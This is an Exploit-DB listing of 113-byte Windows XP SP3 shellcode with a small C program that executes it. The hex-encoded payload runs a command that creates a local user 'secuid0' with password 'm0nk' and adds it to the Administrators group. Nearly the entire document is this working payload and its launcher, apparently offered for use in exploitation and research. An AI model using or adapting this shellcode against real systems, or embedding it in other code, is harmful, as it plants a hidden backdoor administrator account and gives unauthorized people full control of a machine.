Windows/x86 (XP Professional SP3) (English) - Add Administrator User (secuid0/m0nk) Shellcode (113 bytes)

EDB-ID:

15202

CVE:

N/A




Platform:

Windows_x86

Date:

2010-10-04


/*
Title: win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Method: Hardcoded opcodes (kernel32.winexec@7c8623ad, kernel32.exitprocess@7c81cafa)
Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.080413-2111
Greetz: offsec and inj3ct0r teams
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

char code[] = 	"\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23"
				"\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca"
				"\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63"
				"\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"
				"\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x73"
				"\x65\x63\x75\x69\x64\x30\x20\x6d\x30\x6e"
				"\x6b\x20\x2f\x61\x64\x64\x20\x26\x26\x20"
				"\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67"
				"\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e"
				"\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20"
				"\x73\x65\x63\x75\x69\x64\x30\x20\x2f\x61"
				"\x64\x64\x00";

int main(int argc, char **argv)
{
	((void (*)())code)();
	printf("New local admin \tUsername: secuid0\n\t\t\tPassword: m0nk");
	return 0;
}